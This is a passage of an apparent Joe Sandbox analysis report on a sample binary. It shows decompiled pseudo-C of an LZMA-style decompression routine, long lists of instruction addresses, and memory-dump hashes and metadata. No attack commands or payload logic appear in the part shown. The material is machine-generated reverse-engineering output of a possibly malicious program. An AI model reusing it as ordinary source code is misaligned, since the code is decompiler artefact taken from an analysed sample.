													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c27
                                                          0x00406c2d
                                                          0x00406c3f
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406bfb
                                                          0x00406c01
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x004071dc
                                                          0x004071e4
                                                          0x004071eb
                                                          0x004071ed
                                                          0x004071f4
                                                          0x004071f8
                                                          0x004071f8
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00407038
                                                          0x00407038
                                                          0x0040703e
                                                          0x0040703e
                                                          0x004067da
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x004069bf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00406b31
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b6c
                                                          0x00406b6c
                                                          0x00406b70
                                                          0x00407178
                                                          0x00000000
                                                          0x00407178
                                                          0x00406b76
                                                          0x00406b79
                                                          0x00406b7c
                                                          0x00406b80
                                                          0x00406b83
                                                          0x00406b89
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8b
                                                          0x00406b8e
                                                          0x00406b91
                                                          0x00406b91
                                                          0x00406b97
                                                          0x00406b35
                                                          0x00406b35
                                                          0x00406b38
                                                          0x00000000
                                                          0x00406b38
                                                          0x00406b99
                                                          0x00406b99
                                                          0x00406b9c
                                                          0x00406b9f
                                                          0x00406ba2
                                                          0x00406ba5
                                                          0x00406ba8
                                                          0x00406bab
                                                          0x00406bae
                                                          0x00406bb1
                                                          0x00406bb4
                                                          0x00406bb7
                                                          0x00406bcf
                                                          0x00406bd2
                                                          0x00406bd5
                                                          0x00406bd8
                                                          0x00406bd8
                                                          0x00406bdb
                                                          0x00406bdf
                                                          0x00406be1
                                                          0x00406bb9
                                                          0x00406bb9
                                                          0x00406bc1
                                                          0x00406bc6
                                                          0x00406bc8
                                                          0x00406bca
                                                          0x00406bca
                                                          0x00406be4
                                                          0x00406beb
                                                          0x00406bee
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406bf0
                                                          0x00000000
                                                          0x00406e7d
                                                          0x00406e7d
                                                          0x00406e81
                                                          0x004071a8
                                                          0x00000000
                                                          0x004071a8
                                                          0x00406e87
                                                          0x00406e8a
                                                          0x00406e8d
                                                          0x00406e91
                                                          0x00406e94
                                                          0x00406e9a
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9c
                                                          0x00406e9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c4d
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb2
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00407049
                                                          0x0040704d
                                                          0x0040706b
                                                          0x0040706b
                                                          0x0040706b
                                                          0x00407072
                                                          0x00407079
                                                          0x00407080
                                                          0x00407080
                                                          0x00000000
                                                          0x00407080
                                                          0x0040704f
                                                          0x00407052
                                                          0x00407055
                                                          0x00407058
                                                          0x0040705f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040713a
                                                          0x0040713d
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d74
                                                          0x00406d76
                                                          0x00406d7d
                                                          0x00406d7e
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d8b
                                                          0x00406d8e
                                                          0x00406d91
                                                          0x00406d93
                                                          0x00406d95
                                                          0x00406d95
                                                          0x00406d96
                                                          0x00406d99
                                                          0x00406da0
                                                          0x00406da3
                                                          0x00406db1
                                                          0x00000000
                                                          0x00000000
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x0040703e
                                                          0x0040703e
                                                          0x00000000
                                                          0x00407044
                                                          0x0040703e
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cc6
                                                          0x00406cc6
                                                          0x00406cca
                                                          0x00407190
                                                          0x00000000
                                                          0x00407190
                                                          0x00406cd0
                                                          0x00406cd3
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cdb
                                                          0x00406cde
                                                          0x00406ce1
                                                          0x00406ce4
                                                          0x00406ce7
                                                          0x00406cea
                                                          0x00406ced
                                                          0x00406cee
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf0
                                                          0x00406cf3
                                                          0x00406cf6
                                                          0x00406cf9
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cfc
                                                          0x00406cff
                                                          0x00406d01
                                                          0x00406d01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406d04
                                                          0x00406d04
                                                          0x00000000
                                                          0x00406d04
                                                          0x00406f85
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x004071f1
                                                          0x004071f1
                                                          0x00000000
                                                          0x004071f1
                                                          0x0040703e
                                                          0x00406fc5
                                                          0x00406fc2
                                                          0x00000000
                                                          0x00406bf9

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                          • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                          • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                          • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406D13() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
